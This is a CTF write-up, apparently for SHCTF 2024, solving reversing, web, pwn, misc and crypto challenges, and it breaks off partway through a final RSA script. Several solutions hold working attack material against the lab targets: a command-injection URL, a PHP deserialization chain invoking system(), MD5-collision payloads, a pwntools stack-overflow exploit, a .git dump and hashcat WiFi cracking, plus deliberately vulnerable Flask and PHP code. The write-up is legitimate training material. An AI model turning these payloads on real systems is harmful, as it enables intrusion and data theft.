re

gamegame

You can check in by playing a game too?? (The flag format for this challenge is: shctf{*})

It's a sudoku, so just solve it; the flag is the filled-in digits.

import copy

non_puzzle = [
    [5, 3, 0, 0, 7, 0, 0, 0, 0],
    [6, 0, 0, 1, 9, 5, 0, 0, 0],
    [0, 9, 8, 0, 0, 0, 0, 6, 0],
    [8, 0, 0, 0, 6, 0, 0, 0, 3],
    [4, 0, 0, 8, 0, 3, 0, 0, 1],
    [7, 0, 0, 0, 2, 0, 0, 0, 6],
    [0, 6, 0, 0, 0, 0, 2, 8, 0],
    [0, 0, 0, 4, 1, 9, 0, 0, 5],
    [0, 0, 0, 0, 8, 0, 0, 7, 9]
]

puzzle = copy.deepcopy(non_puzzle)

def is_valid_move(puzzle, row, col, num):
    if num in puzzle[row]:
        return False
    if num in [puzzle[r][col] for r in range(9)]:
        return False
    start_row, start_col = 3 * (row // 3), 3 * (col // 3)
    for i in range(3):
        for j in range(3):
            if puzzle[start_row + i][start_col + j] == num:
                return False
    return True

def solve_sudoku(puzzle):
    for row in range(9):
        for col in range(9):
            if puzzle[row][col] == 0:
                for num in range(1, 10):
                    if is_valid_move(puzzle, row, col, num):
                        puzzle[row][col] = num
                        if solve_sudoku(puzzle):
                            return True
                        puzzle[row][col] = 0
                return False
    return True


solve_sudoku(puzzle)

for i in range(len(non_puzzle)):
    for j in range(len(non_puzzle[i])):
        if non_puzzle[i][j] == 0:
            print(puzzle[i][j],end="")

ezxor

Time for more reversing; here comes xor.

enc

Note that strcpy(v10, "o"); copies two bytes, because the string is \0-terminated

enc=[-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]
flag=""
for i in range(26):
    if i%3==1:
        flag += chr((enc[i] ^ 0x21)%256)
    elif i%3==2:
        flag += chr((enc[i] ^ 0x31)%256)
    else:
        flag += chr((enc[i] ^ 0x90)%256)
print(flag)

SHCTF{x0r_N0ce_hxxxoorrr!}

ezrc4

It's time again for RC4, the newcomers' absolute favorite! A symmetric algorithm? So easy!

The v4 array is enc, the v5 array is the key, and the flag length is 21

A variant of RC4 with one extra XOR by 0x66

Decryption
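An added sketch of the variant described above (not the challenge's code and not the author's script): standard RC4 with each output byte XORed once more with 0x66. Where exactly the binary applies the extra XOR is an assumption, and the key and the 21-byte sample flag are constructed for illustration.

```python
"""RC4 with one extra XOR constant, as described in the write-up (added example)."""

TWEAK = 0x66  # the extra XOR value named in the write-up


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key scheduling (KSA) followed by keystream generation (PRGA)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_variant(key: bytes, data: bytes, tweak: int = TWEAK) -> bytes:
    """Assumed variant: out[i] = data[i] ^ keystream[i] ^ tweak.

    XOR is its own inverse, so the same call both encrypts and decrypts.
    """
    stream = rc4_keystream(key, len(data))
    return bytes(b ^ k ^ tweak for b, k in zip(data, stream))


def fix_standard_rc4_output(decoded: bytes, tweak: int = TWEAK) -> bytes:
    """Repair what an unmodified RC4 tool returns for variant ciphertext.

    A stock tool removes only the keystream, leaving every byte off by `tweak`.
    """
    return bytes(b ^ tweak for b in decoded)


# Constructed sample values, not taken from the challenge binary.
SAMPLE_KEY = b"constructed-key"
SAMPLE_FLAG = b"SHCTF{constructed!!!}"  # 21 bytes, matching the stated flag length

if __name__ == "__main__":
    enc = rc4_variant(SAMPLE_KEY, SAMPLE_FLAG)
    print("ciphertext:", enc.hex())
    print("variant decrypt:", rc4_variant(SAMPLE_KEY, enc))
    stock = rc4_variant(SAMPLE_KEY, enc, tweak=0)  # what unmodified RC4 gives
    print("stock RC4 output:", stock)
    print("after fixing:", fix_standard_rc4_output(stock))
```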

ezapk

An apk? Solved in seconds (flag format: SHCTF{*})

enc

key

Encryption process

import base64

encoded_str = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
key=[12, 15, 25, 30, 36]
flag=""

enc = base64.b64decode(encoded_str).decode('utf-8')
for i in range(len(enc)):
    flag+=chr(((ord(enc[i])>>1)-6)^key[i%5])
print(flag)

EzDBG

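Challenge description: The meaning of a sentence in the listener's mind is often like a strange cat coming into the house without a sound; only when it lets out a "meow~" do you notice it is there.

[10.03-16:35] Updated with an attachment of reduced difficulty

Try to find the main function in the EzDBG module

Load the pdb

.sympath <pdb directory>

Find the address of the main function

Look at the disassembly: a simple XOR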

    EzDBG!main:
00007ff6`d4f31a10 4055           push    rbp
00007ff6`d4f31a12 57             push    rdi
00007ff6`d4f31a13 4881ec58010000 sub     rsp, 158h
00007ff6`d4f31a1a 488d6c2420     lea     rbp, [rsp+20h]
00007ff6`d4f31a1f 488d7c2420     lea     rdi, [rsp+20h]
00007ff6`d4f31a24 b91e000000     mov     ecx, 1Eh
00007ff6`d4f31a29 b8cccccccc     mov     eax, 0CCCCCCCCh
00007ff6`d4f31a2e f3ab           rep stos dword ptr [rdi]
00007ff6`d4f31a30 488b0509b60000 mov     rax, qword ptr [EzDBG!__security_cookie{.value} (7ff6d4f3d040)]
00007ff6`d4f31a37 4833c5         xor     rax, rbp
00007ff6`d4f31a3a 48898528010000 mov     qword ptr [rbp+128h], rax
00007ff6`d4f31a41 488d0d1e060100 lea     rcx, [EzDBG!__0BF6D801_EzDBG@cpp (7ff6d4f42066)]
00007ff6`d4f31a48 e837f9ffff     call    EzDBG!@ILT+895(__CheckForDebuggerJustMyCode) (7ff6d4f31384)
00007ff6`d4f31a4d 90             nop     
00007ff6`d4f31a4e 488d5508       lea     rdx, [inputStr{[0]} (rbp+8)]
00007ff6`d4f31a52 488d0dcb920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad24)]
00007ff6`d4f31a59 e83df6ffff     call    EzDBG!@ILT+150(scanf) (7ff6d4f3109b)
00007ff6`d4f31a5e 90             nop     
00007ff6`d4f31a5f c7455400000000 mov     dword ptr [rbp+54h], 0
00007ff6`d4f31a66 eb08           jmp     EzDBG!main+0x60 (7ff6d4f31a70)
00007ff6`d4f31a68 8b4554         mov     eax, dword ptr [rbp+54h]
00007ff6`d4f31a6b ffc0           inc     eax
00007ff6`d4f31a6d 894554         mov     dword ptr [rbp+54h], eax
00007ff6`d4f31a70 837d5427       cmp     dword ptr [rbp+54h], 27h
00007ff6`d4f31a74 7d32           jge     EzDBG!main+0x98 (7ff6d4f31aa8)
00007ff6`d4f31a76 48634554       movsxd  rax, dword ptr [rbp+54h]
00007ff6`d4f31a7a 488d0d7fb50000 lea     rcx, [EzDBG!enc{[0]} (7ff6d4f3d000)]
00007ff6`d4f31a81 0fbe0401       movsx   eax, byte ptr [rcx+rax]
00007ff6`d4f31a85 83f066         xor     eax, 66h
00007ff6`d4f31a88 48634d54       movsxd  rcx, dword ptr [rbp+54h]
00007ff6`d4f31a8c 0fbe4c0d08     movsx   ecx, byte ptr inputStr{[0]} (rbp+8)[rcx]
00007ff6`d4f31a91 3bc1           cmp     eax, ecx
00007ff6`d4f31a93 7411           je      EzDBG!main+0x96 (7ff6d4f31aa6)
00007ff6`d4f31a95 488d0d8c920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad28)]
00007ff6`d4f31a9c e803f7ffff     call    EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31aa1 90             nop     
00007ff6`d4f31aa2 33c0           xor     eax, eax
00007ff6`d4f31aa4 eb11           jmp     EzDBG!main+0xa7 (7ff6d4f31ab7)
00007ff6`d4f31aa6 ebc0           jmp     EzDBG!main+0x58 (7ff6d4f31a68)
00007ff6`d4f31aa8 488d0d91920000 lea     rcx, [EzDBG!`string' (7ff6d4f3ad40)]
00007ff6`d4f31aaf e8f0f6ffff     call    EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31ab4 90             nop     
00007ff6`d4f31ab5 33c0           xor     eax, eax
00007ff6`d4f31ab7 488bf8         mov     rdi, rax
00007ff6`d4f31aba 488d4de0       lea     rcx, [rbp-20h]
00007ff6`d4f31abe 488d153b920000 lea     rdx, [EzDBG!__xt_z[76] (7ff6d4f3ad00)]
00007ff6`d4f31ac5 e856f8ffff     call    EzDBG!@ILT+795(_RTC_CheckStackVars) (7ff6d4f31320)
00007ff6`d4f31aca 488bc7         mov     rax, rdi
00007ff6`d4f31acd 488b8d28010000 mov     rcx, qword ptr [rbp+128h]
00007ff6`d4f31ad4 4833cd         xor     rcx, rbp
00007ff6`d4f31ad7 e8e1f6ffff     call    EzDBG!@ILT+440(__security_check_cookie) (7ff6d4f311bd)
00007ff6`d4f31adc 488da538010000 lea     rsp, [rbp+138h]
00007ff6`d4f31ae3 5f             pop     rdi
00007ff6`d4f31ae4 5d             pop     rbp
00007ff6`d4f31ae5 c3             ret     

enc

Decryption script

# Ciphertext (in hexadecimal)
ciphertext = [
    0x35, 0x2E, 0x25, 0x32, 0x20, 0x1D, 0x03, 0x5E, 0x07, 0x56, 0x00, 0x03,
    0x57, 0x57, 0x53, 0x50, 0x00, 0x54, 0x07, 0x00, 0x07, 0x07, 0x00, 0x03,
    0x50, 0x02, 0x51, 0x5E, 0x5E, 0x03, 0x5F, 0x02, 0x56, 0x03, 0x57, 0x00,
    0x50, 0x50, 0x1B
]
# XOR key
xor_key = 0x66

# Decryption function
def decrypt(ciphertext, key):
    plaintext = ''.join(chr(byte ^ key) for byte in ciphertext)
    return plaintext

# Call the decryption function
decrypted_message = decrypt(ciphertext, xor_key)
print("解密后的信息:", decrypted_message)

web

1zflask

Challenge description: What is robots for?

Visit /s3recttt to get the source code

import os
import flask
from flask import Flask, request, send_from_directory, send_file

app = Flask(__name__)

@app.route('/api')
def api():
    cmd = request.args.get('SSHCTFF', 'ls /')
    result = os.popen(cmd).read()
    return result
    
@app.route('/robots.txt')
def static_from_root():
    return send_from_directory(app.static_folder,'robots.txt')
    
@app.route('/s3recttt')
def get_source():
    file_path = "app.py"
    return send_file(file_path, as_attachment=True)
 
if __name__ == '__main__':
    app.run(debug=True)

/api?SSHCTFF=cat /flag

Eighteen Years of Single-Life Hand Speed (单身十八年的手速)

Challenge description: Click to get the flag

Auto-clicker

Ququ? Ququ! (蛐蛐?蛐蛐!)

Challenge description: Dear web player! Please help fault, who doesn't want to write challenges, gossip about so-and-so, and make the gossip come true

<?php
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
    if($_POST['ququ']!=null){
        $eval_param = $_POST['ququ'];
        if(strncmp($eval_param,'ququk1',6)===0){
            eval($_POST['ququ']);
        }else{
            echo("可以让fault的蛐蛐变成现实么\n");
        }
    }
    echo("蛐蛐成功第一步!\n");

}
else{
    echo("呜呜呜fault还是要出题");
}

$_GET['ququ'] == 114514 is a loose comparison

MD5 Master

Challenge description: Are you an MD5 master?

<?php
highlight_file(__file__);

$master = "MD5 master!";

if(isset($_POST["master1"]) && isset($_POST["master2"])){
    if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
        echo $master . "<br>";
        echo file_get_contents('/flag');
    }
}
else{
    die("master? <br>");
}

Encode with PHP

Send the request with Burp

master1=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%1Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%89%1F%96P%E9%3EV%EE%05%26N%E3%B4%06S%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3%C4%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%81%D9%D4N%E4&master2=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%9Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%09+%96P%E9%3EV%EE%05%26N%E3%B4%06%D3%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC%B1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3D%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%01%D9%D4N%E4

ez_gittt

Challenge description: What? Someone is actually willing to make their secrets public!!!???

Go straight to the /.git route

Dump /.git with githacker

githacker --url http://entry.shc.tf:44345/.git/ --output-folder result

Check the log

git log
git diff 554c928b2f67c9cd7d283706de161e6740c447a8

poppopop

Challenge description: A simple pop

Source code

<?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T{

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou;
    public $flag;
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
if (isset($_GET['data'])) {
    highlight_file(__FILE__);
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
    echo "小丑离我远点!!!";
}

One-shot solve

<?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T{

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou;
    public $flag;
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
$a=new SHCTF();
$a->isyou='system';
$a->flag='cat /flllag';
$b=new C();
$b->p=$a;
$c=new F();
$c->o=$b;
$d=new T();
$d->n=$c;
echo base64_encode(serialize($d));

Pass it as the GET parameter

jvav

Challenge description: vavj

import java.io.*;

public class demo{
    public static void main(String[] args) {
        try {
            ProcessBuilder builder = new ProcessBuilder("sh", "-c", "cat /flag");
            Process process = builder.start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            process.waitFor();
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}

pwn

Sign In (签个到吧)

Challenge description: close nc

Filtering; executes in 1s

No stack overflow1

Challenge description: stack overflow? I wrote a simple checker to determine whether a stack overflow exists. Is this checker reasonable??

strlen check; bypass with \x00

from pwn import*

p=remote("entry.shc.tf",21687)
p.recvline()
shelladrress=0x4011DE
payload=b'\x00'*0x117+p64(shelladrress)
p.sendline(payload)
p.interactive()

misc

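True and False? Covered and Concealed! (真真假假?遮遮掩掩!)

Challenge description: Fake is fake and real is real; what's the use of covering things up!

The challenge name hints at pseudo-encryption; set the flag bit to 0

flag.txt still can't be opened; there is another layer of encryption

The comment below gives a password hint

Brute-forced password: SHCTF202410FTCHS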

SHCTF{C0ngr@tu1at1ons_On_Mast3r1ng_mAsk_aTT@ck5!}
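An added example (not part of the original write-up) of the flag-bit step above: it walks the central directory, lists entries whose general-purpose flag has the encrypted bit set, clears the bit in a copy, and uses extraction plus the CRC check to separate a fake flag from real encryption. The sample archive and all function names are constructed for illustration; a single-disk, non-ZIP64 archive is assumed.

```python
import io
import struct
import zipfile
import zlib

ENCRYPTED_BIT = 0x0001  # bit 0 of the general-purpose flag: "entry is encrypted"


def flag_offsets(buf: bytes):
    """Walk the central directory; return [(name, central_flag_off, local_flag_off)]."""
    eocd = buf.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("end-of-central-directory record not found")
    # total entries (2 bytes), central directory size (4), central directory offset (4)
    count, _size, pos = struct.unpack_from("<HII", buf, eocd + 10)
    found = []
    for _ in range(count):
        if buf[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local,) = struct.unpack_from("<I", buf, pos + 42)
        if buf[local:local + 4] != b"PK\x03\x04":
            raise ValueError("bad local file header")
        name = buf[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        found.append((name, pos + 8, local + 6))  # flag word sits at +8 / +6
        pos += 46 + name_len + extra_len + comment_len
    return found


def flagged_entries(buf: bytes):
    """Names of entries whose central or local header has the encrypted bit set."""
    return [name for name, cd, lf in flag_offsets(buf)
            if (buf[cd] | buf[lf]) & ENCRYPTED_BIT]


def patch_encryption_bit(buf: bytes, on: bool) -> bytes:
    """Return a copy with bit 0 set or cleared in both headers of every entry."""
    out = bytearray(buf)
    for _name, cd, lf in flag_offsets(buf):
        for off in (cd, lf):
            if on:
                out[off] |= ENCRYPTED_BIT
            else:
                out[off] &= ~ENCRYPTED_BIT & 0xFF
    return bytes(out)


def readable_entries(buf: bytes):
    """Names that extract without a password and pass zipfile's CRC check."""
    ok = []
    with zipfile.ZipFile(io.BytesIO(buf)) as zf:
        for info in zf.infolist():
            try:
                zf.read(info)
                ok.append(info.filename)
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                pass  # password required, CRC mismatch, or data that really is ciphertext
    return ok


def build_sample() -> bytes:
    """Constructed sample: a plain archive with the encrypted bit forced on."""
    raw = io.BytesIO()
    with zipfile.ZipFile(raw, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("hint.txt", "constructed sample content")
    return patch_encryption_bit(raw.getvalue(), on=True)


if __name__ == "__main__":
    sample = build_sample()
    print("flagged:", flagged_entries(sample), "readable:", readable_entries(sample))
    fixed = patch_encryption_bit(sample, on=False)
    print("flagged:", flagged_entries(fixed), "readable:", readable_entries(fixed))
```

An entry that is still missing from readable_entries() after the bit is cleared is genuinely encrypted, which is the situation the write-up hits with flag.txt.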

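Apprenticeship Journey ① (拜师之旅①)

Challenge description: The annual Roxy beautiful photo showcase has begun, and Nanian233 happens to be going to apprentice under pngMaster next week and take the entrance exam. Let's use this one for practice first

The PNG header is missing

Fix the width and height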

import zlib
import struct

file = 'roxy.png'
with open(file, 'rb') as f:
    fr = f.read()

# Bytes 12..28: the IHDR chunk type plus its 13 data bytes, i.e. what the CRC covers
data = bytearray(fr[12:29])
# Bytes 29..32: the CRC32 stored in the file for the IHDR chunk
crc32key = struct.unpack('>I', fr[29:33])[0]
print(crc32key)

n = 4096
for w in range(n):
    width = struct.pack('>I', w)
    data[4:8] = width
    for h in range(n):
        height = struct.pack('>I', h)
        data[8:12] = height
        if zlib.crc32(data) == crc32key:
            print(crc32key)
            print(w, h)
            print(data)
            # Write the recovered width/height into the IHDR of a copy of the file
            newpic = bytearray(fr)
            newpic[16:20] = width
            newpic[20:24] = height
            with open(file + '.png', 'wb') as fw:
                fw.write(newpic)

roxy.png

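Why Not Use the WiFi? (有WiFi干嘛不用呢?)

Challenge description: Every time k1 comes to sleep over he has to connect to the WiFi; please help him get the WiFi password. Flag submission format: SHCTF{WiFi password}.

A while ago, while doing a moectf RE challenge, I happened to run into WiFi traffic cracking

This challenge provides a may folder; judging by the file names and file contents, they are most likely passwords

Extract them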

import os

folder_path = r'./may'
output_file = 'passwd.txt'

with open(output_file, 'w', encoding='utf-8') as f:
    for filename in os.listdir(folder_path):
        file_path = os.path.join(folder_path, filename)
        if os.path.isfile(file_path):
            f.write(f'{filename}\n')
            with open(file_path, 'r', encoding='utf-8') as file:
                content = file.read()

                f.write(f'{content[1:-2]}\n')

Convert it with hashcat hcxpcapngtool - advanced password recovery

Dictionary attack

./hashcat -m 22000 -a 0 2165215_1728068768.hc22000 passwd.txt

Rasterizing Traffic

Challenge description: Man! What can I say!!!

Analyzing the capture, a single PNG is the only thing that really stands out

Export it and delete the extra data

png

Raster

from PIL import Image
import numpy as np

for j in range(5):
    img = Image.open('.png').convert('L')
    width, height = img.size
    img_data = np.array(img)
    interval = 5
    # Shift the mask by one column on each pass
    start = 1 + j
    # Black out 4 of every 5 columns, leaving one visible column per period
    for i in range(start, width, interval):
        img_data[:, i:i + interval - 1] = 0

    new_image = Image.fromarray(img_data)
    new_image.save(f'./ouput/{j}.png')

SHCTF{1111z_tr@ff1c_aNaLys13}

crypto

EzAES

Challenge description: The simplest of simple AES

Source code

from Crypto.Cipher import AES
import os

iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = open('flag.txt', 'rb').read()
flag += (16 - len(flag) % 16) * b' '
c = my_aes.encrypt(flag)
print(c)
print(iv)
print(key)
'''
b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
'''

Decryption

from Crypto.Cipher import AES


key = b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
iv = b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'


my_aes_decrypt = AES.new(key, AES.MODE_CBC, iv)

ciphertext = b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'

plaintext = my_aes_decrypt.decrypt(ciphertext)

plaintext = plaintext.rstrip(b' ')

print(plaintext)

Hello Crypto

Challenge description: Hello, modern cryptography

Source code

from Crypto.Util.number import bytes_to_long
from secret import flag

m = bytes_to_long(flag)
print("m =",m)

# In cryptography, m stands for message, also plaintext
# so, why this m is number?
# decrypt this Message to get flag!
# m = 215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781

I'm honestly in tears; this is the first challenge I've been able to work out by hand without using AI, sob sob

Decryption script

from Crypto.Util.number import*

m=215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
flag=long_to_bytes(m)
print(flag)

factor

factor and combination

Factor with yafu

.\yafu-x64.exe "factor(202684025069666122928943870473693390943999154246475102682928603649889979837891808145761938294210543968287387118675294961417296597826107898446066891091139992043145111792866874820404982180534411)"

One-shot solve with GPT

from itertools import combinations
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long

# The given list of primes (obtained by factoring N)
prime_list = [
    18382585067038096651,
    14840413069428752761,
    9845968710564320221,
    11985382012119355663,
    16974023387369024819,
    15073937162523269353,
    15879874287378916289,
    12489385236654944237,
    11580488510409206699,
    10713468965251790263
]

# The given ciphertext and public exponent e
c = 74957645771347063156084390560511541272461735783664273246902636936377661944639588841276568374009308588456113421628518882519406151899764
e = 65537

# 1. Try each combination of 7 primes and compute n and phi(n)
for p_list in combinations(prime_list, 7):
    n = 1
    for p in p_list:
        n *= p

    # Compute phi(n)
    phi_n = 1
    for p in p_list:
        phi_n *= (p - 1)

    # 2. Compute the private key d
    d = inverse(e, phi_n)

    # 3. Try to decrypt the ciphertext
    try:
        m = pow(c, d, n)
        flag = long_to_bytes(m)
        if b'CTF{' in flag:  # check the flag format
            print(f"解密成功: {flag}")
            break
    except ValueError:
        continue

baby_mod

Challenge description: modulus = mod

Challenge source code

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(777)
t = getPrime(777)
tmp = getPrime(15)
e = 65537
n = p*q
print(f"c = {pow(m,e,n)}")
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
'''

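Searching for p*r-q*t-tmp turned up SRCTF2024-baby, which is extremely similar

I tried scripts from several people and in the end used DexterJie's script: SRCTF | DexterJie’Blog

I didn't change any of the signs, just replaced the values, and it produced the result directly. I don't understand it, but I am deeply shocked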

from Crypto.Util.number import *

c = -69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317

Ge = Matrix(ZZ,[
    [leak,0,0,0],
    [r,1,0,0],
    [t,0,1,0],
    [-1,0,0,2^500]
])

Ge[:,0] *= 2^2000

for line in Ge.LLL():
    if line[0] == 0:
        p,q = abs(line[1]),abs(line[2])
        n = p * q
        d = inverse(65537,(p-1)*(q-1))
        m = pow(c,d,n)
        print(long_to_bytes(m))
        # SRCTF{0896649c53c145919ce741f180957834}

Interestingly, another person's code also produced the result in the end

import itertools


def small_roots(f, bounds, m=1, d=None):  # multivariate Coppersmith
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    for i in range(m + 1):
        base = N ^ (m - i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []

c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317

R.<p,q> = Zmod(leak)[]
for tmp in range(2 ^ 14,  2 ^ 15):
    f = p*r-q*t-tmp
    res = small_roots(f, bounds=(2 ^ 512, 2 ^ 512), m=3, d=2)
    if res:
        print(res)
        break

It just takes quite a while to run; after all, it is 2 to the 14th power

from Crypto.Util.number import inverse, long_to_bytes

# The recovered primes and the ciphertext
p=11799365899073049527038222991817294163432468116739044155324163062605081459516948129587956698210751311282285532041297993219199812623993179858635079156564471
q=7920780147742343919802692215442217736320564739726806695299813117512855265349275493667659977160207404159832804023039365285757320911861469820804465066706263
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446

# RSA parameters
n = p * q
